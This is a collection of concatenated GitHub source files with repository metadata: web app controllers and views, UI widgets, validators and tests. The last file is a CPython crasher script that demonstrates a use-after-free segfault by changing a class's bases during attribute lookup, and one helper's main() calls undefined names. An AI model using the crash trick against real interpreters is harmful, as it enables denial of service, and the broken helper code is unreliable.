# Second, displays all the comparisons by these users in this venue.
q = ((db.comparison.venue_id == c.id) &
(db.comparison.user.belongs(reviewers)) & (db.comparison.is_valid == True))
db.comparison.ordering.represent = represent_ordering
db.comparison.user.represent = represent_user_by_submission_feedback
db.comparison.venue_id.readable = False
fields=[db.comparison.user, db.comparison.venue_id,
db.comparison.grades, db.comparison.submission_nicknames, db.comparison.date,]
if is_user_admin():
fields=[db.comparison.user, db.comparison.venue_id,
db.comparison.grades, db.comparison.submission_nicknames,
db.comparison.is_valid, db.comparison.date,]
q = ((db.comparison.venue_id == c.id) & (db.comparison.user.belongs(reviewers)))
grid = SQLFORM.grid(q,
field_id=db.comparison.id,
fields=fields,
csv=True,
args=request.args[:1],
user_signature=False,
details=False, create=False,
editable=False, deletable=False,
maxtextlength=24,
)
return dict(subm=subm, venue=c, grid=grid)
@auth.requires_login()
def view_comparisons_given_user():
"""This function displays comparisons for a user in a given venue.
The arguments are user, venue_id."""
props = db(db.user_properties.user == get_user_email()).select().first()
user = request.args(0) or redirect(URL('default', 'index'))
venue_id = request.args(1) or redirect(URL('default', 'index'))
c = db.venue(venue_id) or redirect(URL('default', 'index'))
if not access.can_observe(c, props):
session.flash = T('Not authorized')
redirect(URL('default', 'index'))
# Create query.
q = ((db.comparison.venue_id == venue_id) &
(db.comparison.user == user) & (db.comparison.is_valid == True))
db.comparison.ordering.represent = represent_ordering
db.comparison.venue_id.readable = False
db.comparison.user.represent = represent_user_by_submission_feedback
fields=[db.comparison.user, db.comparison.venue_id,
db.comparison.grades, db.comparison.submission_nicknames, db.comparison.date,]
if is_user_admin():
fields=[db.comparison.user, db.comparison.venue_id, db.comparison.grades,
db.comparison.submission_nicknames, db.comparison.is_valid, db.comparison.date,]
q = ((db.comparison.venue_id == venue_id) &
(db.comparison.user == user))
grid = SQLFORM.grid(q,
field_id=db.comparison.id,
fields=fields,
csv=True,
args=request.args[:2],
user_signature=False,
details=False, create=False,
editable=False, deletable=False,
maxtextlength=24,
)
return dict(user=user, venue=c, grid=grid)
@auth.requires_login()
def view_exp_grades():
"""This function enables to select experimental grades
that are available for a venue, and display them."""
if not is_user_admin():
session.flash = T('Not authorized.')
redirect(URL('default', 'index'))
c = db.venue(request.args(0))
rows = db(db.grades_exp.venue_id == c.id).select(db.grades_exp.run_id, distinct=True)
experiment_list = [r.run_id for r in rows]
# Produces a multiple-choice form, indicating which results one wants to display.
form = SQLFORM.factory(
Field('run_ids', 'list:string', requires=IS_IN_SET(experiment_list, multiple=True)),
)
if form.process().accepted:
# Redirects to displaying those selected experiments.
if isinstance(form.vars.run_ids, basestring):
exp_list = form.vars.run_ids
else:
exp_list = ','.join(form.vars.run_ids)
redirect(URL('ranking', 'view_grades', args=[request.args(0)], vars={'run_ids': exp_list}))
venue_link = A(c.name, _href=URL('venues', 'view_venue', args=[c.id]))
return dict(form=form, venue_link=venue_link)
| {
"content_hash": "d42820b935ba1105aee9a79280e922b3",
"timestamp": "",
"source": "github",
"line_count": 510,
"max_line_length": 147,
"avg_line_length": 45.92745098039216,
"alnum_prop": 0.6225504845664518,
"repo_name": "lucadealfaro/crowdranker",
"id": "9db9371077d5e2cb6de7b4beeed39bf4bf16425f",
"size": "23448",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "controllers/ranking.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "28695"
},
{
"name": "JavaScript",
"bytes": "143454"
},
{
"name": "Python",
"bytes": "500631"
}
],
"symlink_target": ""
} |
from django.contrib.auth.models import User
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.views.decorators.http import require_POST
from django.http import HttpResponseRedirect
from social.models import Friend
@login_required
def friendlist(request):
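    # Friendships are stored one-way; collect accepted rows in both directions
    # so the list contains everyone the user is friends with.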
friends_inbound = Friend.objects.filter(accepted = True, to_user = request.user)
friends_outbound = Friend.objects.filter(accepted = True, from_user = request.user)
friends = [x.from_user for x in friends_inbound]
friends.extend([y.to_user for y in friends_outbound])
return render(request, 'friends.html', {'friends': friends,
'invites': Friend.objects.filter(to_user = request.user, accepted = False)})
@login_required
def remove_friend(request, id):
try:
friend = User.objects.get(pk = id)
Friend.objects.filter(from_user = request.user, to_user = friend).delete()
Friend.objects.filter(to_user = request.user, from_user = friend).delete()
except:
pass
return HttpResponseRedirect('/social/friends/')
@login_required
@require_POST
def request_friend(request):
    # TODO: Handle errors more gracefully than raising and swallowing them.
try:
other = User.objects.get(username = request.REQUEST['name'])
if other == request.user:
raise "Cannot befriend yourself"
if (len(Friend.objects.filter(from_user = request.user, to_user = other)) > 0) or (len(Friend.objects.filter(to_user = request.user, from_user = other)) > 0):
raise "Relation already exists"
Friend(from_user = request.user, to_user = other).save()
except:
pass
return HttpResponseRedirect('/social/friends/')
@login_required
def accept_request(request, id):
try:
f = Friend.objects.get(pk = id, to_user = request.user)
f.accepted = True
f.save()
except:
pass
return HttpResponseRedirect('/social/friends/')
@login_required
def deny_request(request, id):
try:
f = Friend.objects.get(pk = id, to_user = request.user)
f.delete()
except:
pass
return HttpResponseRedirect('/social/friends/') | {
"content_hash": "40262f8a91a171ad38aa13e9f86f0f21",
"timestamp": "",
"source": "github",
"line_count": 63,
"max_line_length": 166,
"avg_line_length": 34.42857142857143,
"alnum_prop": 0.6754264638082066,
"repo_name": "Ezphares/sw809f14",
"id": "42b882306da473484980a47a562164275d9e4d6a",
"size": "2195",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "runweb/social/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "6883"
},
{
"name": "Groovy",
"bytes": "853"
},
{
"name": "Java",
"bytes": "32589"
},
{
"name": "JavaScript",
"bytes": "78998"
},
{
"name": "Python",
"bytes": "29264"
},
{
"name": "Shell",
"bytes": "2586"
}
],
"symlink_target": ""
} |
"""
Simple example:
.. UIExample:: 50
b = ui.Button(text="Push me")
Example with interaction:
.. UIExample:: 200
from flexx import app, ui, event
class Example(ui.BoxPanel):
def init(self):
with ui.VBox():
self.b1 = ui.Button(text='apple')
self.b2 = ui.Button(text='banana')
self.b3 = ui.Button(text='pear')
self.buttonlabel= ui.Label(text='...')
with ui.VBox():
self.r1 = ui.RadioButton(text='apple')
self.r2 = ui.RadioButton(text='banana')
self.r3 = ui.RadioButton(text='pear')
self.radiolabel = ui.Label(text='...')
with ui.VBox():
self.c1 = ui.CheckBox(text='apple')
self.c2 = ui.CheckBox(text='banana')
self.c3 = ui.CheckBox(text='pear')
self.checklabel = ui.Label(text='...')
class JS:
@event.connect('b1.mouse_click', 'b2.mouse_click','b3.mouse_click', )
def _button_clicked(self, *events):
ev = events[-1]
self.buttonlabel.text = 'Clicked on the ' + ev.source.text
@event.connect('r1.checked', 'r2.checked','r3.checked')
def _radio_changed(self, *events):
# There will also be events for radio buttons being unchecked, but
# Flexx ensures that the last event is for the one being checked
ev = events[-1]
self.radiolabel.text = 'Selected the ' + ev.source.text
@event.connect('c1.checked', 'c2.checked','c3.checked', )
def _check_changed(self, *events):
selected = [c.text for c in (self.c1, self.c2, self.c3) if c.checked]
if selected:
self.checklabel.text = 'Selected: ' + ', '.join(selected)
else:
self.checklabel.text = 'None selected'
"""
from ... import event
from . import Widget
class BaseButton(Widget):
""" Abstract button class.
"""
CSS = """
.flx-BaseButton {
white-space: nowrap;
}
.flx-RadioButton, .flx-CheckBox {
margin-left: 0.5em;
margin-right: 0.5em;
}
.flx-RadioButton label, .flx-CheckBox label {
margin-left: 0.2em;
}
"""
class Both:
@event.prop
def text(self, v=''):
""" The text on the button.
"""
return str(v)
@event.prop
def checked(self, v=False):
""" Whether the button is checked. Applicable for CheckBox,
RadioButton and ToggleButton.
"""
return bool(v)
@event.prop
def disabled(self, v=False):
""" Whether the button is disabled.
"""
return bool(v)
class JS:
@event.emitter
def mouse_click(self, e):
""" Event emitted when the mouse is clicked.
See mouse_down() for a description of the event object.
"""
return self._create_mouse_event(e)
class Button(BaseButton):
""" A push button.
"""
class JS:
def _init_phosphor_and_node(self):
self.phosphor = self._create_phosphor_widget('button')
self.node = self.phosphor.node
self.node.addEventListener('click', self.mouse_click, 0)
@event.connect('text')
def __text_changed(self, *events):
self.node.innerHTML = events[-1].new_value
@event.connect('disabled')
def __disabled_changed(self, *events):
if events[-1].new_value:
self.node.setAttribute("disabled", "disabled")
else:
self.node.removeAttribute("disabled")
class ToggleButton(BaseButton):
""" A button that can be toggled. It behaves like a checkbox, while
looking more like a regular button.
"""
CSS = """
.flx-ToggleButton-checked {
color: #00B;
font-weight: bolder;
}
"""
class JS:
def _init_phosphor_and_node(self):
self.phosphor = self._create_phosphor_widget('button')
self.node = self.phosphor.node
self.node.addEventListener('click', self.mouse_click, 0)
@event.connect('text')
def __text_changed(self, *events):
self.node.innerHTML = events[-1].new_value
@event.connect('mouse_click')
def __toggle_checked(self, *events):
self.checked = not self.checked
@event.connect('checked')
def __check_changed(self, *events):
if self.checked:
self.node.classList.add('flx-ToggleButton-checked')
else:
self.node.classList.remove('flx-ToggleButton-checked')
class RadioButton(BaseButton):
""" A radio button. Of any group of radio buttons that share the
same parent, only one can be active.
"""
class JS:
def _init_phosphor_and_node(self):
self.phosphor = p = self._create_phosphor_widget('div')
template = '<input type="radio" id="ID"><label for="ID">'
p.node.innerHTML = template.replace('ID', self.id)
self.node = p.node.childNodes[0]
self.text_node = p.node.childNodes[1]
self.node.addEventListener('click', self._check_radio_click, 0)
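        # Radio buttons that share a parent use the parent's id as their HTML
        # group name (see __update_group below), so the browser keeps at most
        # one of them checked at a time.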
@event.connect('parent')
def __update_group(self, *events):
if self.parent:
self.node.name = self.parent.id
@event.connect('text')
def __text_changed(self, *events):
#self.node.innerHTML = events[-1].new_value
self.text_node.innerHTML = events[-1].new_value
@event.connect('checked')
def __check_changed(self, *events):
self.node.checked = self.checked
def _check_radio_click(self, ev):
""" This method is called on JS a click event. We *first* update
the checked properties, and then emit the Flexx click event.
That way, one can connect to the click event and have an
up-to-date checked props (even on Py).
"""
# Turn off any radio buttons in the same group
if self.parent:
for child in self.parent.children:
if isinstance(child, RadioButton) and child is not self:
child.checked = child.node.checked
# Turn on this button (last)
self.checked = self.node.checked
# Process actual click event
self.mouse_click(ev)
class CheckBox(BaseButton):
""" A checkbox button.
"""
class JS:
def _init_phosphor_and_node(self):
self.phosphor = p = self._create_phosphor_widget('div')
template = '<input type="checkbox" id="ID"><label for="ID">'
p.node.innerHTML = template.replace('ID', self.id)
self.node = p.node.childNodes[0]
self.text_node = p.node.childNodes[1]
self.node.addEventListener('click', self.mouse_click, 0)
self.node.addEventListener('change', self._check_changed_from_dom, 0)
@event.connect('text')
def __text_changed(self, *events):
#self.node.innerHTML = events[-1].new_value
self.text_node.innerHTML = events[-1].new_value
@event.connect('checked')
def __check_changed(self, *events):
self.node.checked = self.checked
def _check_changed_from_dom(self, ev):
self.checked = self.node.checked
| {
"content_hash": "15eac81648155acaab27ee65d4a4277c",
"timestamp": "",
"source": "github",
"line_count": 241,
"max_line_length": 85,
"avg_line_length": 31.738589211618258,
"alnum_prop": 0.5450385671329585,
"repo_name": "JohnLunzer/flexx",
"id": "b66a89b1d0e9a741067a8c7c3968466f0ab825fd",
"size": "7649",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "flexx/ui/widgets/_button.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "HTML",
"bytes": "3085"
},
{
"name": "JavaScript",
"bytes": "2932"
},
{
"name": "Python",
"bytes": "1193274"
}
],
"symlink_target": ""
} |
import types
import collections
import optparse
import sys
__all__ = ("wrap", "indent", "Join", "fl", "fd")
# ------------------------------------------------------------
def wrap(s, wrapping):
"Wrap a string s before and after with the value of wrapping."
return "{0}{1}{0}".format(wrapping, s)
def bpad(s, padding="\n\n"):
"Pad a string s before and after with two newlines."
return wrap(s, padding)
def indent(s, padding=" ", depth=1):
"Pad the start of s with padding repeated depth times."
return "{0}{1}".format(padding * depth, s)
def lpad(s, padding=" "):
"Pad the start of a string s with the value of padding."
return wrap(s, padding)
# ------------------------------------------------------------
def ljoin(l):
"Joins a list with newlines."
return "\n".join(l)
def cjoin(l):
"Joins a list with commas."
return ", ".join(l)
def sjoin(l):
"Joins a list with commas."
return " ".join(l)
class Join(object):
l = ljoin
c = cjoin
s = sjoin
# ------------------------------------------------------------
def get_column_formatter(*cols):
fmt_string = sjoin("{{{0}{1}}}".format(i, c) for i, c in enumerate(cols))
def fmt_columns(*items):
if len(items) == 1 and isinstance(items, list):
items = items[0]
return fmt_string.format(*items)
return fmt_columns
# ------------------------------------------------------------
_list_column_formatter = get_column_formatter(":>10", "!s")
def fl(l):
"Format a list as idx: value pairs on separate lines."
return ljoin(_list_column_formatter(i + 1, v) for i, v in enumerate(l))
_dict_column_formatter = get_column_formatter(":20", "!s")
def fd(d, order_by_value=False):
"Format a dictionary as key: value pairs on separate lines, in sorted key order by default."
    items = sorted(d.items(), key=lambda kv: (kv[1] if order_by_value else kv[0]))
return ljoin(_dict_column_formatter(*i) for i in items)
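# A minimal usage sketch (hypothetical values):
#
#   print(fl(["apple", "pear"]))   # one "index value" pair per line, index right-aligned to 10 columns
#   print(fd({"b": 2, "a": 1}))    # one "key value" pair per line, keys padded to 20 columns, sorted by key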
# ------------------------------------------------------------
def main(argv=None):
"""Run as a command-line script: colorize a python file or stdin using ANSI
color escapes and print(to stdout.)
Inputs:
- argv(None): a list of strings like sys.argv[1:] giving the command-line
arguments. If None, use sys.argv[1:].
"""
usage_msg = """%prog [options] [filename]
Colorize a python file or stdin using ANSI color escapes and print(to stdout.)
If no filename is given, or if filename is -, read standard input."""
parser = optparse.OptionParser(usage=usage_msg)
newopt = parser.add_option
newopt('-s','--scheme',metavar='NAME',dest='scheme_name',action='store',
choices=['Linux','LightBG','NoColor'],default=_scheme_default,
help="give the color scheme to use. Currently only 'Linux'\
(default) and 'LightBG' and 'NoColor' are implemented (give without\
quotes)")
opts,args = parser.parse_args(argv)
if len(args) > 1:
parser.error("you must give at most one filename.")
if len(args) == 0:
fname = '-' # no filename given; setup to read from stdin
else:
fname = args[0]
if fname == '-':
stream = sys.stdin
else:
stream = file(fname)
parser = Parser()
# we need nested try blocks because pre-2.5 python doesn't support unified
# try-except-finally
try:
try:
# write colorized version to stdout
parser.format(stream.read(),scheme=opts.scheme_name)
except IOError as msg:
# if user reads through a pager and quits, don't print(traceback)
if msg.args != (32,'Broken pipe'):
raise
finally:
if stream is not sys.stdin:
stream.close() # in case a non-handled exception happened above
if __name__ == "__main__":
main()
| {
"content_hash": "9c8fce54f98816540fb716826e99d1a6",
"timestamp": "",
"source": "github",
"line_count": 133,
"max_line_length": 94,
"avg_line_length": 28.36842105263158,
"alnum_prop": 0.5791147627882322,
"repo_name": "spiralx/mypy",
"id": "ed5f755663e8ea7e304a657af00ad21116c77f4f",
"size": "3782",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mypy/st.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "109682"
},
{
"name": "JavaScript",
"bytes": "170251"
},
{
"name": "Python",
"bytes": "298163"
},
{
"name": "Shell",
"bytes": "81"
}
],
"symlink_target": ""
} |
"""Cloud browser URLs."""
from django.conf.urls import patterns, url
from django.views.generic.base import RedirectView
from cloud_browser.app_settings import settings
from cloud_browser.views import UploadFileView, MkdirView, DeleteView, \
RenameView, MoveFileView
# pylint: disable=invalid-name, no-value-for-parameter
urlpatterns = patterns(
'cloud_browser.views',
url(r'^$',
RedirectView.as_view(url='browser'),
name="cloud_browser_index"),
url(r'^browser/(?P<path>.*)$', 'browser', name="cloud_browser_browser"),
url(r'^document/(?P<path>.*)$', 'document', name="cloud_browser_document"),
url(r'^upload/$', UploadFileView.as_view(), name='upload'),
url(r'^mkdir/$', MkdirView.as_view(), name='mkdir'),
url(r'^delete/$', DeleteView.as_view(), name='delete'),
url(r'^rename/$', RenameView.as_view(), name='rename'),
url(r'^move/$', MoveFileView.as_view(), name='move'),
)
if settings.app_media_url is None:
# Use a static serve.
urlpatterns += patterns(
'',
url(r'^app_media/(?P<path>.*)$', 'django.views.static.serve',
{'document_root': settings.app_media_doc_root},
name="cloud_browser_media"),
)
| {
"content_hash": "e81873efeb30f18f9537a807df0758a0",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 79,
"avg_line_length": 39.12903225806452,
"alnum_prop": 0.6430338004946414,
"repo_name": "lantip/aws-filemanager",
"id": "68a983e02b047afb0b7e054502173c2becc8c44e",
"size": "1213",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "cloud_browser/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4449"
},
{
"name": "HTML",
"bytes": "14401"
},
{
"name": "JavaScript",
"bytes": "5794"
},
{
"name": "Python",
"bytes": "133825"
}
],
"symlink_target": ""
} |
from arsenalExtractor import *
class ExtractionFactory:
def createExtractor(self, team):
if team == "Arsenal":
return ArsenalExtractor()
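# A minimal usage sketch (hypothetical team names):
#
#   factory = ExtractionFactory()
#   extractor = factory.createExtractor("Arsenal")   # returns an ArsenalExtractor
#   other = factory.createExtractor("Chelsea")       # no match, implicitly returns None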
| {
"content_hash": "870631ded2246f784a9ec226c2cae830",
"timestamp": "",
"source": "github",
"line_count": 7,
"max_line_length": 36,
"avg_line_length": 22.714285714285715,
"alnum_prop": 0.6855345911949685,
"repo_name": "DownCastAce/SoccerFixtureService",
"id": "fa15be59c957b7e8152f9abf8fea175a4ccdaf1f",
"size": "159",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "extractionFactory.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "2201"
}
],
"symlink_target": ""
} |
from django.test import TestCase
from django.core.exceptions import ValidationError
from django_dynamic_fixture import G
from nose.plugins.attrib import attr
from oscar.core.compat import get_user_model
from oscar.apps.catalogue.reviews import models
from oscar.test.factories import create_product
User = get_user_model()
@attr('reviews')
class TestAnAnonymousReview(TestCase):
def setUp(self):
self.product = create_product()
self.data = {
'product': self.product,
'title': 'This product is lovely',
'body': 'I really like this cheese',
'score': 0,
'name': 'JR Hartley',
'email': 'hartley@example.com'
}
def review(self, **kwargs):
if kwargs:
data = self.data.copy()
data.update(kwargs)
else:
data = self.data
return models.ProductReview(**data)
def test_can_be_created(self):
review = self.review()
review.full_clean()
def test_requires_a_title(self):
review = self.review(title="")
self.assertRaises(ValidationError, review.full_clean)
def test_requires_a_body(self):
review = self.review(body="")
self.assertRaises(ValidationError, review.full_clean)
def test_requires_a_name(self):
review = self.review(name="")
self.assertRaises(ValidationError, review.full_clean)
def test_requires_an_email_address(self):
review = self.review(email="")
self.assertRaises(ValidationError, review.full_clean)
def test_requires_non_whitespace_title(self):
review = self.review(title=" ")
self.assertRaises(ValidationError, review.full_clean)
def test_starts_with_no_votes(self):
review = self.review()
review.save()
self.assertFalse(review.has_votes)
self.assertEquals(0, review.num_up_votes)
self.assertEquals(0, review.num_down_votes)
def test_has_reviewer_name_property(self):
review = self.review(name="Dave")
self.assertEquals("Dave", review.reviewer_name)
@attr('reviews')
class TestAUserReview(TestCase):
def setUp(self):
self.product = create_product()
self.user = G(User, first_name="Tom", last_name="Thumb")
self.data = {
'product': self.product,
'title': 'This product is lovely',
'body': 'I really like this cheese',
'score': 0,
'user': self.user
}
def review(self, **kwargs):
if kwargs:
data = self.data.copy()
data.update(kwargs)
else:
data = self.data
return models.ProductReview(**data)
def test_can_be_created(self):
review = self.review()
review.full_clean()
def test_requires_a_title(self):
review = self.review(title="")
self.assertRaises(ValidationError, review.full_clean)
def test_requires_a_body(self):
review = self.review(body="")
self.assertRaises(ValidationError, review.full_clean)
def test_has_reviewer_name_property(self):
review = self.review()
self.assertEquals("Tom Thumb", review.reviewer_name)
@attr('reviews')
class TestVotingOnAReview(TestCase):
def setUp(self):
self.product = create_product()
self.user = G(User)
self.voter = G(User)
self.review = self.product.reviews.create(
title='This is nice',
score=3,
body="This is the body",
user=self.user)
def test_updates_totals_for_upvote(self):
self.review.vote_up(self.voter)
self.assertTrue(self.review.has_votes)
self.assertEquals(1, self.review.total_votes)
self.assertEquals(1, self.review.delta_votes)
def test_updates_totals_for_downvote(self):
self.review.vote_down(self.voter)
self.assertTrue(self.review.has_votes)
self.assertEquals(1, self.review.total_votes)
self.assertEquals(-1, self.review.delta_votes)
def test_is_permitted_for_normal_user(self):
is_allowed, reason = self.review.can_user_vote(self.voter)
self.assertTrue(is_allowed, reason)
def test_is_not_permitted_for_reviewer(self):
is_allowed, reason = self.review.can_user_vote(self.user)
self.assertFalse(is_allowed, reason)
def test_is_not_permitted_for_previous_voter(self):
self.review.vote_up(self.voter)
is_allowed, reason = self.review.can_user_vote(self.voter)
self.assertFalse(is_allowed, reason)
| {
"content_hash": "455cfe7468034bba921bbd2737737ccb",
"timestamp": "",
"source": "github",
"line_count": 146,
"max_line_length": 66,
"avg_line_length": 31.5,
"alnum_prop": 0.6236138290932811,
"repo_name": "Idematica/django-oscar",
"id": "61cef0313c0b903ac4752c771fdc9abe2c3f7f0f",
"size": "4599",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "tests/integration/catalogue/reviews/model_tests.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "1099824"
},
{
"name": "JavaScript",
"bytes": "818932"
},
{
"name": "Puppet",
"bytes": "3507"
},
{
"name": "Python",
"bytes": "4079718"
},
{
"name": "Shell",
"bytes": "5760"
},
{
"name": "XSLT",
"bytes": "49764"
}
],
"symlink_target": ""
} |
from __future__ import unicode_literals, print_function, absolute_import
#
# Copyright 2015 MarkLogic Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0#
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# File History
# ------------
#
# Paul Hoehne 03/05/2015 Initial development
#
"""
Validators are utility functions used by various classes to validate
input.
"""
class ValidationError(Exception):
"""
A validation error class
"""
def __init__(self, message, original_value):
self._message = message
self._original_value = original_value
def __repr__(self):
"Validation Error('{0}', {1})".format(self._message, self._original_value)
def validate_boolean(raw_val):
"""
Validate a boolean.
"""
if type(raw_val) != bool:
raise ValidationError('Value passed is not a boolean', repr(raw_val))
def validate_index_type(raw_val):
"""
Validate a scalar index type.
"""
valid_index_types = {"int", "unsignedInt", "long", "unsignedLong", "float", "double", "decimal", "dateTime",
"time", "date", "gYearMonth", "gYear", "gMonth", "gDay", "yearMonthDuration",
"dayTimeDuration", "string", "anyURI"}
if raw_val not in valid_index_types:
raise ValidationError('Value is not a valid index type', repr(raw_val))
def validate_index_invalid_value_actions(raw_val):
"""
Validate the invalid value actions on an index.
"""
valid_actions = {'ignore', 'reject'}
if raw_val not in valid_actions:
raise ValidationError("Value is not a valid action for invalid index values", repr(raw_val))
def validate_stemmed_searches_type(raw_val):
"""
Validate the stemmed searches value.
"""
valid_types = {'off', 'basic', 'advanced', 'decompounding'}
if raw_val not in valid_types:
raise ValidationError("Stemmed search type is not a valid type of stemmed search", repr(raw_val))
def validate_integer_range(raw_val, min, max):
"""
Validate an intenger in a range.
"""
if raw_val not in range(min, (1 + max)):
raise ValidationError("Integer value out of range", repr(raw_val))
def validate_directory_creation(raw_val):
"""
Validate the directory creation setting.
"""
if raw_val not in ['manual', 'automatic', 'manual-enforced']:
raise ValidationError("Invalid directory creation method", repr(raw_val))
def validate_locking_type(raw_val):
"""
Validate locking type.
"""
if raw_val not in ['strict', 'fast', 'off']:
raise ValidationError("Invalid locking option", repr(raw_val))
def validate_range_index_optimize_options(raw_val):
"""
Validate a range index optimization option.
"""
if raw_val not in ['facet-time', 'memory-size']:
raise ValidationError("Range index optimize option is not a valid value", repr(raw_val))
def validate_format_compatibility_options(raw_val):
"""
Validate a format compatability option.
"""
if raw_val not in ['5.0', '4.2', '4.1', '4.0', '3.2']:
raise ValidationError("On disk index format comatibility objest is not a valide value", repr(raw_val))
def validate_index_detection_options(raw_val):
"""
Validate an index detection option.
"""
if raw_val not in ['automatic', 'none']:
raise ValidationError("Index detection options is not a valid value", repr(raw_val))
def validate_expunge_locks_options(raw_val):
"""
Validate an expunge locks option.
"""
if raw_val not in ['automatic', 'none']:
raise ValidationError("Expunge locks option is not a valid value", repr(raw_val))
def validate_term_frequency_normalization_options(raw_val):
"""
Validate a term frequency normalization option.
"""
if raw_val not in ['unscaled-log', 'weakest-scaled-log', 'weakly-scaled-log', 'moderately-scaled-log',
'strongly-scaled-log', 'scaled-log']:
raise ValidationError("Term frequency normalization option is not a valid value", repr(raw_val))
def validate_merge_priority_options(raw_val):
"""
    Validate a merge priority option.
"""
if raw_val not in ['lower', 'normal']:
raise ValidationError("Merge priority option is not a valid value", repr(raw_val))
def validate_assignment_policy_options(raw_val):
"""
Validate an assignment policy option.
"""
if raw_val not in ['bucket', 'statistical', 'range', 'legacy']:
raise ValidationError("Assignment policy option is not a valid value", repr(raw_val))
def validate_privilege_kind(raw_val):
"""
Validate a privilege kind.
"""
if raw_val not in ['uri', 'execute']:
raise ValidationError("Privilege kind is not a valid value", repr(raw_val))
def validate_custom(message):
"""
Raise a validation error.
"""
raise ValidationError("Validation error", repr(message))
def validate_forest_availability(raw_val):
"""
Validate a forest availability value.
"""
if raw_val not in ['online', 'offline']:
raise ValidationError("Forest availability status is not a valid value", repr(raw_val))
def validate_string(raw_val):
"""
Validate that the value is a string.
"""
if type(raw_val) is not str:
raise ValidationError("String expected.", repr(raw_val))
def validate_list_of_strings(raw_val):
"""
Validate that the value is a list of strings.
"""
if type(raw_val) is not list:
raise ValidationError("List of strings expected.", repr(raw_val))
for value in raw_val:
if type(value) is not str:
raise ValidationError("List of strings expected.", repr(raw_val))
def validate_coordinate_system(raw_val):
"""
Validate a geospatial index coordinate system.
"""
if raw_val not in ['wgs84', 'raw']:
raise ValidationError("Invalid coordinate system", repr(raw_val))
def validate_point_format(raw_val):
"""
Validate a geospatial index point format.
"""
if raw_val not in ['point', 'lat-long-point']:
raise ValidationError("Invalid point format", repr(raw_val))
def validate_capability(raw_val):
"""
Validate a capability.
"""
if raw_val not in ['read', 'insert', 'update', 'execute']:
raise ValidationError("Invalid capability", repr(raw_val))
def validate_collation(index_type, collation):
"""
    Validate a collation for an index type.
"""
# FIXME: really validate the collation string!
if index_type == "string":
return
if (index_type == "anyURI"
and collation == "http://marklogic.com/collation/codepoint"):
return
if collation is None or collation == "":
return
    raise ValidationError('Collation cannot be {0} for an index of type {1}' \
                          .format(collation, index_type), repr(collation))
def validate_type(raw_val, cls):
"""
Validate that the value is of the specified type.
"""
if not isinstance(raw_val, cls):
raise ValidationError('Value passed is not a {0}' \
.format(cls.__name__), repr(raw_val))
def assert_type(raw_val, cls):
"""
Assert that the value is of the specified type.
:return The value if it passes the type test, otherwise raise an exception
"""
if isinstance(raw_val, cls):
return raw_val
raise ValidationError('Value passed is not a {0}' \
.format(cls.__name__), repr(raw_val))
def assert_boolean(raw_val):
"""
Assert that the value is boolean.
:return The value if it is boolean, otherwise raise an exception
"""
return assert_type(raw_val, bool)
def validate_list_of_type(raw_val, cls):
"""
Validate a list of the specified type.
"""
if type(raw_val) is not list:
raise ValidationError("List of {0} expected.".format(cls.__name__),
repr(raw_val))
for value in raw_val:
if type(value) is not cls:
raise ValidationError("List of {0} expected.".format(cls.__name__),
repr(raw_val))
def assert_list_of_type(raw_val, cls):
"""
Assert that the value is a list of the specified type.
A single value of the specified type is returned as a list of length 1.
:return The value if it is an appropriate list, otherwise raise an exception
"""
if type(raw_val) is cls:
return [ raw_val ]
validate_list_of_type(raw_val, cls)
return raw_val
| {
"content_hash": "4b0fb273c1f2677d1073f0deeeeb27f0",
"timestamp": "",
"source": "github",
"line_count": 285,
"max_line_length": 112,
"avg_line_length": 31.512280701754385,
"alnum_prop": 0.6411312771406302,
"repo_name": "supriyantomaftuh/python_api",
"id": "83fb49bfe0b0f5e7259d8c84d71a6eedc018d45d",
"size": "9005",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python_api/marklogic/utilities/validators.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "213"
},
{
"name": "Python",
"bytes": "719010"
},
{
"name": "Shell",
"bytes": "2535"
}
],
"symlink_target": ""
} |
"""
There is a way to put keys of any type in a type's dictionary.
I think this allows various kinds of crashes, but so far I have only
found a convoluted attack of _PyType_Lookup(), which uses the mro of the
type without holding a strong reference to it. Probably works with
super.__getattribute__() too, which uses the same kind of code.
"""
class MyKey(object):
def __hash__(self):
return hash('mykey')
def __cmp__(self, other):
# the following line decrefs the previous X.__mro__
X.__bases__ = (Base2,)
# trash all tuples of length 3, to make sure that the items of
# the previous X.__mro__ are really garbage
z = []
for i in range(1000):
z.append((i, None, None))
return -1
class Base(object):
mykey = 'from Base'
class Base2(object):
mykey = 'from Base2'
# you can't add a non-string key to X.__dict__, but it can be
# there from the beginning :-)
X = type('X', (Base,), {MyKey(): 5})
print(X.mykey)
# I get a segfault, or a slightly wrong assertion error in a debug build.
| {
"content_hash": "1df3f1c1fb593d6472d435a900888af6",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 73,
"avg_line_length": 30.857142857142858,
"alnum_prop": 0.6324074074074074,
"repo_name": "MalloyPower/parsing-python",
"id": "a8c6e63ee2bc7562c435b4541bb2784fdc2e3c86",
"size": "1080",
"binary": false,
"copies": "2",
